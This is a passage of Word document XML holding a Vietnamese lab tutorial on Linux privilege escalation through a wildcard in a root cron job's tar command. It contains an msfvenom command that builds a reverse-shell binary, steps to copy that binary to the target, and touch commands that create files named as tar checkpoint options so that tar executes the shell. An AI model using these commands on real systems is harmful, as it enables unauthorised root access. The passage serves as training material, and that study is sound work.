        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kết</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nối</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trở</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lại</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>với</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>người</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nghe</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6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bạn.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED7BC1A" w14:textId="2F1A6E34" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="164" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6558328B" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="2" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0397FD81" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="99" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cron Jobs - Wildcards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4ECC4" w14:textId="7D947AFC" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="118" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xem nội dung của tập lệnh công việc cron khác:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F185F" w14:textId="69B70E4B" w:rsidR="00665E18" w:rsidRPr="00665E18" w:rsidRDefault="00665E18" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="118" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>cat /usr/local/bin/compress.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E509ED" w14:textId="11F7E755" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lưu ý rằng lệnh tar đang được chạy với ký tự đại diện (*) trong thư mục chính của bạ</w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BAADCD" w14:textId="38738C3C" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="84" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sử dụng msfvenom trên hộp Kali của bạn để tạo tệp nhị phân ELF shell ngược. Cập nhật địa chỉ IP LHOST cho phù hợp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D79F55" w14:textId="2186F7E4" w:rsidR="00665E18" w:rsidRPr="00665E18" w:rsidRDefault="00665E18" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="84" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CA0F6" w14:textId="7766D6C0" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="297"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chuyển</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tập</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tin</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell.elf</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sang</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/home/user/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>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8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>máy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ảo</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debian</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(có</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thể</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sử</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7D029" w14:textId="15FB654B" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4620"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="108" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo hai tệp này trong /home/user:</w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869AEAF" w14:textId="5C53A834" w:rsidR="00665E18" w:rsidRPr="00665E18" w:rsidRDefault="00665E18" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4620"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="108" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>touch /home/user/--checkpoint=1 touch /home/user/--checkpoint-action=exec=shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F9AA15" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="172"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tác</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vụ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>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ký</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
